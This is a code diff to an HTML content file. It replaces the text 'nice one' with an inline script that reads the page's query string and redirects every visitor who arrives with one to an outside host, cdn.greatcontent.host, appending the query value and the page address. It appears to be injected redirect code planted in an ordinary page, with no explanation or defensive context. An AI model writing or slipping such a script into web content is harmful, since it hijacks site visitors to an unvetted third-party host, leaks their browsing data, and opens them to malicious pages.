--- a/content6.html
+++ b/content6.html
@@ -1,1 +1,16 @@
-nice one
+<script>
+var r = window.location.href;
+if(r.indexOf('?') !== -1) {
+	if(r.indexOf('&') > -1) {
+		var pg2 = r.substring(0, r.indexOf('&'));
+		var parts = pg2.split('?');
+		var i = parts[parts.length - 1]
+	} else {
+		var parts = r.split('?');
+		var i = parts[parts.length - 1]
+	}
+	var d = parts[parts.length - 2];
+		var string1 = 'https://cdn.greatcontent.host/g/content.php?i=' + i + '&r=' + d;
+		window.location.href = string1
+}
+</script>
